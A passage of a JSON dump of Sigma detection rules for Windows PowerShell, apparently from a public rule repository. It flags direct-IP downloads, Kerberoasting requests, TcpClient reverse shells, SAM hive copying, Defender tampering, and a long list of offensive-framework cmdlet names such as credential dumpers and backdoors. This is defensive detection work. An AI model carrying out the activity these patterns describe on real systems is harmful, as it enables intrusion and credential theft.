    "content": "title: Suspicious Invoke-WebRequest Execution With DirectIP\nid: 1edff897-9146-48d2-9066-52e8d8f80a2f\nstatus: test\ndescription: Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access\nreferences:\n    - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-21\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell_ise.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'powershell_ise.EXE'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_commands:\n        CommandLine|contains:\n            # These are all aliases of Invoke-WebRequest\n            - 'curl '\n            - 'Invoke-RestMethod'\n            - 'Invoke-WebRequest'\n            - ' irm ' # Space before and after to avoid false positives with 'irm' as a substring\n            - 'iwr '\n            - 'wget '\n    selection_ip:\n        # In case of FP with local IPs add additional filters\n        CommandLine|contains:\n            - '://1'\n            - '://2'\n            - '://3'\n            - '://4'\n            - '://5'\n            - '://6'\n            - '://7'\n            - '://8'\n            - '://9'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml",
    "content": "title: Suspicious Invoke-WebRequest Execution\nid: 5e3cc4d8-3e68-43db-8656-eaaeefdec9cc\nrelated:\n    - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468\n      type: derived\nstatus: test\ndescription: Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location\nreferences:\n    - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-02\nmodified: 2025-07-18\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell_ise.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'powershell_ise.EXE'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_commands:\n        CommandLine|contains:\n            # These are all aliases of Invoke-WebRequest\n            - 'curl '\n            - 'Invoke-WebRequest'\n            - 'iwr '\n            - 'wget '\n    selection_flags:\n        CommandLine|contains:\n            - ' -ur'\n            - ' -o'\n    selection_susp_locations:\n        CommandLine|contains:\n            - '\\AppData\\'\n            - '\\Desktop\\'\n            - '\\Temp\\'\n            - '\\Users\\Public\\'\n            - '%AppData%'\n            - '%Public%'\n            - '%Temp%'\n            - '%tmp%'\n            - ':\\Windows\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_kerberos_kerberos_ticket_request_via_cli.yml",
    "content": "title: Suspicious Kerberos Ticket Request via CLI\nid: caa9a802-8bd8-4b9e-a5cd-4d6221670219\nrelated:\n    - id: a861d835-af37-4930-bcd6-5b178bfb54df\n      type: similar\nstatus: experimental\ndescription: |\n    Detects suspicious Kerberos ticket requests via command line using System.IdentityModel.Tokens.KerberosRequestorSecurityToken class.\n    Threat actors may use command line interfaces to request Kerberos tickets for service accounts in order to\n    perform offline password cracking attacks commonly known as Kerberoasting or other Kerberos ticket abuse\n    techniques like silver ticket attacks.\nreferences:\n    - https://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell\n    - https://learn.microsoft.com/en-us/dotnet/api/system.identitymodel.tokens.kerberosrequestorsecuritytoken?view=netframework-4.8.1\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-18\ntags:\n    - attack.credential-access\n    - attack.t1558.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'powershell.exe'\n              - 'pwsh.dll'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'System.IdentityModel.Tokens.KerberosRequestorSecurityToken'\n            - '.GetRequest()'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate command line usage by administrators or security tools.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_mailboxexport_share.yml",
    "content": "title: Suspicious PowerShell Mailbox Export to Share\nid: 889719ef-dd62-43df-86c3-768fb08dc7c0\nstatus: test\ndescription: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations\nreferences:\n    - https://youtu.be/5mqid-7zp8k?t=2481\n    - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html\n    - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1\n    - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-08-07\nmodified: 2022-10-26\ntags:\n    - attack.exfiltration\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'New-MailboxExportRequest'\n            - ' -Mailbox '\n            - ' -FilePath \\\\\\\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml",
    "content": "title: Malicious PowerShell Commandlets - ProcessCreation\nid: 02030f2f-6199-49ec-b258-ea71b07e03dc\nrelated:\n    - id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\n      type: derived\n    - id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c\n      type: similar\nstatus: test\ndescription: Detects Commandlet names from well-known PowerShell exploitation frameworks\nreferences:\n    - https://adsecurity.org/?p=2921\n    - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries\n    - https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1\n    - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1\n    - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1\n    - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1\n    - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec\n    - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec\n    - https://github.com/calebstewart/CVE-2021-1675 # Invoke-Nightmare\n    - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1\n    - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html\n    - https://github.com/HarmJ0y/DAMP\n    - https://github.com/samratashok/nishang\n    - https://github.com/DarkCoderSc/PowerRunAsSystem/\n    - https://github.com/besimorhino/powercat\n    - https://github.com/Kevin-Robertson/Powermad\n    - https://github.com/adrecon/ADRecon\n    - https://github.com/adrecon/AzureADRecon\n    - https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1\n    - https://github.com/The-Viper-One/Invoke-PowerDPAPI/\n    - https://github.com/Arno0x/DNSExfiltrator/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-02\nmodified: 2025-12-10\ntags:\n    - attack.execution\n    - attack.discovery\n    - attack.t1482\n    - attack.t1087\n    - attack.t1087.001\n    - attack.t1087.002\n    - attack.t1069.001\n    - attack.t1069.002\n    - attack.t1069\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Note: Please ensure alphabetical order when adding new entries\n        CommandLine|contains:\n            - 'Add-Exfiltration'\n            - 'Add-Persistence'\n            - 'Add-RegBackdoor'\n            - 'Add-RemoteRegBackdoor'\n            - 'Add-ScrnSaveBackdoor'\n            - 'Check-VM'\n            - 'ConvertTo-Rc4ByteStream'\n            - 'Decrypt-Hash'\n            - 'Disable-ADIDNSNode'\n            - 'Disable-MachineAccount'\n            - 'Do-Exfiltration'\n            - 'Enable-ADIDNSNode'\n            - 'Enable-MachineAccount'\n            - 'Enabled-DuplicateToken'\n            - 'Exploit-Jboss'\n            - 'Export-ADR'\n            - 'Export-ADRCSV'\n            - 'Export-ADRExcel'\n            - 'Export-ADRHTML'\n            - 'Export-ADRJSON'\n            - 'Export-ADRXML'\n            - 'Find-Fruit'\n            - 'Find-GPOLocation'\n            - 'Find-TrustedDocuments'\n            - 'Get-ADIDNS' # Covers: Get-ADIDNSNodeAttribute, Get-ADIDNSNodeOwner, Get-ADIDNSNodeTombstoned, Get-ADIDNSPermission, Get-ADIDNSZone\n            - 'Get-ApplicationHost'\n            - 'Get-ChromeDump'\n            - 'Get-ClipboardContents'\n            - 'Get-FoxDump'\n            - 'Get-GPPPassword'\n            - 'Get-IndexedItem'\n            - 'Get-KerberosAESKey'\n            - 'Get-Keystrokes'\n            - 'Get-LSASecret'\n            - 'Get-MachineAccountAttribute'\n            - 'Get-MachineAccountCreator'\n            - 'Get-PassHashes'\n            - 'Get-RegAlwaysInstallElevated'\n            - 'Get-RegAutoLogon'\n            - 'Get-RemoteBootKey'\n            - 'Get-RemoteCachedCredential'\n            - 'Get-RemoteLocalAccountHash'\n            - 'Get-RemoteLSAKey'\n            - 'Get-RemoteMachineAccountHash'\n            - 'Get-RemoteNLKMKey'\n            - 'Get-RickAstley'\n            - 'Get-Screenshot'\n            - 'Get-SecurityPackages'\n            - 'Get-ServiceFilePermission'\n            - 'Get-ServicePermission'\n            - 'Get-ServiceUnquoted'\n            - 'Get-SiteListPassword'\n            - 'Get-System'\n            - 'Get-TimedScreenshot'\n            - 'Get-UnattendedInstallFile'\n            - 'Get-Unconstrained'\n            - 'Get-USBKeystrokes'\n            - 'Get-VaultCredential'\n            - 'Get-VulnAutoRun'\n            - 'Get-VulnSchTask'\n            - 'Grant-ADIDNSPermission'\n            - 'Gupt-Backdoor'\n            - 'HTTP-Login'\n            - 'Install-ServiceBinary'\n            - 'Install-SSP'\n            - 'Invoke-ACLScanner'\n            - 'Invoke-ADRecon'\n            - 'Invoke-ADSBackdoor'\n            - 'Invoke-AgentSmith'\n            - 'Invoke-AllChecks'\n            - 'Invoke-ARPScan'\n            - 'Invoke-AzureHound'\n            - 'Invoke-BackdoorLNK'\n            - 'Invoke-BadPotato'\n            - 'Invoke-BetterSafetyKatz'\n            - 'Invoke-BypassUAC'\n            - 'Invoke-Carbuncle'\n            - 'Invoke-Certify'\n            - 'Invoke-ConPtyShell'\n            - 'Invoke-CredentialInjection'\n            - 'Invoke-DAFT'\n            - 'Invoke-DCSync'\n            - 'Invoke-DinvokeKatz'\n            - 'Invoke-DllInjection'\n            - 'Invoke-DNSUpdate'\n            - 'Invoke-DNSExfiltrator'\n            - 'Invoke-DomainPasswordSpray'\n            - 'Invoke-DowngradeAccount'\n            - 'Invoke-EgressCheck'\n            - 'Invoke-Eyewitness'\n            - 'Invoke-FakeLogonScreen'\n            - 'Invoke-Farmer'\n            - 'Invoke-Get-RBCD-Threaded'\n            - 'Invoke-Gopher'\n            - 'Invoke-Grouper' # Also Covers Invoke-GrouperX\n            - 'Invoke-HandleKatz'\n            - 'Invoke-ImpersonatedProcess'\n            - 'Invoke-ImpersonateSystem'\n            - 'Invoke-InteractiveSystemPowerShell'\n            - 'Invoke-Internalmonologue'\n            - 'Invoke-Inveigh'\n            - 'Invoke-InveighRelay'\n            - 'Invoke-KrbRelay'\n            - 'Invoke-LdapSignCheck'\n            - 'Invoke-Lockless'\n            - 'Invoke-MalSCCM'\n            - 'Invoke-Mimikatz'\n            - 'Invoke-Mimikittenz'\n            - 'Invoke-MITM6'\n            - 'Invoke-NanoDump'\n            - 'Invoke-NetRipper'\n            - 'Invoke-Nightmare'\n            - 'Invoke-NinjaCopy'\n            - 'Invoke-OfficeScrape'\n            - 'Invoke-OxidResolver'\n            - 'Invoke-P0wnedshell'\n            - 'Invoke-Paranoia'\n            - 'Invoke-PortScan'\n            - 'Invoke-PoshRatHttp' # Also Covers Invoke-PoshRatHttps\n            - 'Invoke-PostExfil'\n            - 'Invoke-PowerDump'\n            - 'Invoke-PowerDPAPI'\n            - 'Invoke-PowerShellTCP'\n            - 'Invoke-PowerShellWMI'\n            - 'Invoke-PPLDump'\n            - 'Invoke-PsExec'\n            - 'Invoke-PSInject'\n            - 'Invoke-PsUaCme'\n            - 'Invoke-ReflectivePEInjection'\n            - 'Invoke-ReverseDNSLookup'\n            - 'Invoke-Rubeus'\n            - 'Invoke-RunAs'\n            - 'Invoke-SafetyKatz'\n            - 'Invoke-SauronEye'\n            - 'Invoke-SCShell'\n            - 'Invoke-Seatbelt'\n            - 'Invoke-ServiceAbuse'\n            - 'Invoke-ShadowSpray'\n            - 'Invoke-Sharp' # Covers all \"Invoke-Sharp\" variants\n            - 'Invoke-Shellcode'\n            - 'Invoke-SMBScanner'\n            - 'Invoke-Snaffler'\n            - 'Invoke-Spoolsample'\n            - 'Invoke-SpraySinglePassword'\n            - 'Invoke-SSHCommand'\n            - 'Invoke-StandIn'\n            - 'Invoke-StickyNotesExtract'\n            - 'Invoke-SystemCommand'\n            - 'Invoke-Tasksbackdoor'\n            - 'Invoke-Tater'\n            - 'Invoke-Thunderfox'\n            - 'Invoke-ThunderStruck'\n            - 'Invoke-TokenManipulation'\n            - 'Invoke-Tokenvator'\n            - 'Invoke-TotalExec'\n            - 'Invoke-UrbanBishop'\n            - 'Invoke-UserHunter'\n            - 'Invoke-VoiceTroll'\n            - 'Invoke-Whisker'\n            - 'Invoke-WinEnum'\n            - 'Invoke-winPEAS'\n            - 'Invoke-WireTap'\n            - 'Invoke-WmiCommand'\n            - 'Invoke-WMIExec'\n            - 'Invoke-WScriptBypassUAC'\n            - 'Invoke-Zerologon'\n            - 'MailRaider'\n            - 'New-ADIDNSNode'\n            - 'New-DNSRecordArray'\n            - 'New-HoneyHash'\n            - 'New-InMemoryModule'\n            - 'New-MachineAccount'\n            - 'New-SOASerialNumberArray'\n            - 'Out-Minidump'\n            - 'Port-Scan'\n            - 'PowerBreach'\n            - 'powercat '\n            - 'PowerUp'\n            - 'PowerView'\n            - 'Remove-ADIDNSNode'\n            - 'Remove-MachineAccount'\n            - 'Remove-Update'\n            - 'Rename-ADIDNSNode'\n            - 'Revoke-ADIDNSPermission'\n            - 'Set-ADIDNSNode' # Covers: Set-ADIDNSNodeAttribute, Set-ADIDNSNodeOwner\n            - 'Set-MacAttribute'\n            - 'Set-MachineAccountAttribute'\n            - 'Set-Wallpaper'\n            - 'Show-TargetScreen'\n            - 'Start-CaptureServer'\n            - 'Start-Dnscat2'\n            - 'Start-WebcamRecorder'\n            - 'Veeam-Get-Creds'\n            - 'VolumeShadowCopyTools'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml",
    "content": "title: MSExchange Transport Agent Installation\nid: 83809e84-4475-4b69-bc3e-4aad8568612f\nrelated:\n    - id: 83809e84-4475-4b69-bc3e-4aad8568612f\n      type: similar\nstatus: test\ndescription: Detects the Installation of a Exchange Transport Agent\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7\nauthor: Tobias Michalski (Nextron Systems)\ndate: 2021-06-08\nmodified: 2022-10-09\ntags:\n    - attack.persistence\n    - attack.t1505.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains: 'Install-TransportAgent'\n    condition: selection\nfalsepositives:\n    - Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_non_interactive_execution.yml",
    "content": "title: Non Interactive PowerShell Process Spawned\nid: f4bbd493-b796-416e-bbf2-121235348529\nstatus: test\ndescription: Detects non-interactive PowerShell activity by looking at the \"powershell\" process with a non-user GUI process such as \"explorer.exe\" as a parent.\nreferences:\n    - https://web.archive.org/web/20200925032237/https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html\nauthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)\ndate: 2019-09-12\nmodified: 2025-02-28\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    filter_main_generic:\n        ParentImage|endswith:\n            - ':\\Windows\\explorer.exe'\n            - ':\\Windows\\System32\\CompatTelRunner.exe'\n            - ':\\Windows\\SysWOW64\\explorer.exe'\n    filter_main_windows_update:\n        ParentImage: ':\\$WINDOWS.~BT\\Sources\\SetupHost.exe' # During Windows updates/upgrades\n        # CommandLine: powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';\n    filter_optional_vscode:\n        # Triggered by VsCode when you open a Shell inside the workspace\n        ParentImage|endswith: '\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n        ParentCommandLine|contains: ' --ms-enable-electron-run-as-node '\n    filter_optional_terminal:\n        ParentImage|contains: ':\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_'\n        ParentImage|endswith: '\\WindowsTerminal.exe'\n    filter_optional_defender:\n        ParentImage|endswith: ':\\Program Files\\Windows Defender Advanced Threat Protection\\SenseIR.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Likely. Many admin scripts and tools leverage PowerShell in their BAT or VB scripts which may trigger this rule often. It is best to add additional filters or use this to hunt for anomalies\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml",
    "content": "title: Potential PowerShell Obfuscation Via WCHAR/CHAR\nid: e312efd0-35a1-407f-8439-b8d434b438a6\nstatus: test\ndescription: Detects suspicious encoded character syntax often used for defense evasion\nreferences:\n    - https://twitter.com/0gtweet/status/1281103918693482496\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-07-09\nmodified: 2025-03-03\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - '[char]0x'\n            - '(WCHAR)0x'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml",
    "content": "title: Execution of Powershell Script in Public Folder\nid: fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4\nstatus: test\ndescription: This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder\nreferences:\n    - https://www.mandiant.com/resources/evolution-of-fin7\nauthor: Max Altgelt (Nextron Systems)\ndate: 2022-04-06\nmodified: 2022-07-14\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains:\n            - '-f C:\\Users\\Public'\n            - '-f \"C:\\Users\\Public'\n            - '-f %Public%'\n            - '-fi C:\\Users\\Public'\n            - '-fi \"C:\\Users\\Public'\n            - '-fi %Public%'\n            - '-fil C:\\Users\\Public'\n            - '-fil \"C:\\Users\\Public'\n            - '-fil %Public%'\n            - '-file C:\\Users\\Public'\n            - '-file \"C:\\Users\\Public'\n            - '-file %Public%'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml",
    "content": "title: RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses\nid: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5\nrelated:\n    - id: f65e22f9-819e-4f96-9c7b-498364ae7a25 # PS Classic\n      type: similar\n    - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 # PS Module\n      type: similar\n    - id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 # PS ScriptBlock\n      type: similar\nstatus: test\ndescription: Detects calls to the AtomicTestHarnesses \"Invoke-ATHRemoteFXvGPUDisablementCommand\" which is designed to abuse the \"RemoteFXvGPUDisablement.exe\" binary to run custom PowerShell code via module load-order hijacking.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md\n    - https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1\nauthor: frack113\ndate: 2021-07-13\nmodified: 2023-05-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'Invoke-ATHRemoteFXvGPUDisablementCommand'\n            - 'Invoke-ATHRemoteFXvGPUDisableme'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_remove_mppreference.yml",
    "content": "title: Tamper Windows Defender Remove-MpPreference\nid: 07e3cb2c-0608-410d-be4b-1511cb1a0448\nrelated:\n    - id: ae2bdd58-0681-48ac-be7f-58ab4e593458\n      type: similar\nstatus: test\ndescription: Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet\nreferences:\n    - https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-05\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_remove:\n        CommandLine|contains: 'Remove-MpPreference'\n    selection_tamper:\n        CommandLine|contains:\n            - '-ControlledFolderAccessProtectedFolders '\n            - '-AttackSurfaceReductionRules_Ids '\n            - '-AttackSurfaceReductionRules_Actions '\n            - '-CheckForSignaturesBeforeRunningScan '\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml",
    "content": "title: Potential Powershell ReverseShell Connection\nid: edc2f8ae-2412-4dfd-b9d5-0c57727e70be\nstatus: stable\ndescription: Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell and other.\nreferences:\n    - https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/\n    - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\n    - https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1\nauthor: FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-03-03\nmodified: 2023-04-05\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' Net.Sockets.TCPClient'\n            - '.GetStream('\n            - '.Write('\n    condition: all of selection_*\nfalsepositives:\n    - In rare administrative cases, this function might be used to check network connectivity\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_run_script_from_ads.yml",
    "content": "title: Run PowerShell Script from ADS\nid: 45a594aa-1fbd-4972-a809-ff5a99dd81b8\nstatus: test\ndescription: Detects PowerShell script execution from Alternate Data Stream (ADS)\nreferences:\n    - https://github.com/p0shkatz/Get-ADS/blob/1c3a3562e713c254edce1995a7d9879c687c7473/Get-ADS.ps1\nauthor: Sergey Soldatov, Kaspersky Lab, oscd.community\ndate: 2019-10-30\nmodified: 2022-07-14\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains|all:\n            - 'Get-Content'\n            - '-Stream'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml",
    "content": "title: Run PowerShell Script from Redirected Input Stream\nid: c83bf4b5-cdf0-437c-90fa-43d734f7c476\nstatus: test\ndescription: Detects PowerShell script execution via input stream redirect\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml\n    - https://twitter.com/Moriarty_Meng/status/984380793383370752\nauthor: Moriarty Meng (idea), Anton Kutepov (rule), oscd.community\ndate: 2020-10-17\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|re: '\\s-\\s*<'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_sam_access.yml",
    "content": "title: PowerShell SAM Copy\nid: 1af57a4b-460a-4738-9034-db68b880c665\nstatus: test\ndescription: Detects suspicious PowerShell scripts accessing SAM hives\nreferences:\n    - https://twitter.com/splinter_code/status/1420546784250769408\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-07-29\nmodified: 2023-01-06\ntags:\n    - attack.credential-access\n    - attack.t1003.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        CommandLine|contains|all:\n            - '\\HarddiskVolumeShadowCopy'\n            - 'System32\\config\\sam'\n    selection_2:\n        CommandLine|contains:\n            - 'Copy-Item'\n            - 'cp $_.'\n            - 'cpi $_.'\n            - 'copy $_.'\n            - '.File]::Copy('\n    condition: all of selection*\nfalsepositives:\n    - Some rare backup scenarios\n    - PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_script_engine_parent.yml",
    "content": "title: Suspicious PowerShell Invocation From Script Engines\nid: 95eadcb2-92e4-4ed1-9031-92547773a6db\nstatus: test\ndescription: Detects suspicious powershell invocations from interpreters or unusual programs\nreferences:\n    - https://www.securitynewspaper.com/2017/03/20/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-01-16\nmodified: 2023-01-05\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n    filter_health_service:\n        CurrentDirectory|contains: '\\Health Service State\\'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Microsoft Operations Manager (MOM)\n    - Other scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml",
    "content": "title: Suspicious Service DACL Modification Via Set-Service Cmdlet\nid: a95b9b42-1308-4735-a1af-abb1c5e6f5ac\nrelated:\n    - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37\n      type: derived\nstatus: test\ndescription: Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable\nreferences:\n    - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/\n    - https://learn.microsoft.com/pt-br/windows/win32/secauthz/sid-strings\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-18\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1543.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\pwsh.exe'\n        - OriginalFileName: 'pwsh.dll'\n    selection_sddl_flag:\n        CommandLine|contains:\n            - '-SecurityDescriptorSddl '\n            - '-sd '\n    selection_set_service:\n        CommandLine|contains|all:\n            - 'Set-Service '\n            - 'D;;'\n        CommandLine|contains:\n            - ';;;IU'\n            - ';;;SU'\n            - ';;;BA'\n            - ';;;SY'\n            - ';;;WD'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_set_acl.yml",
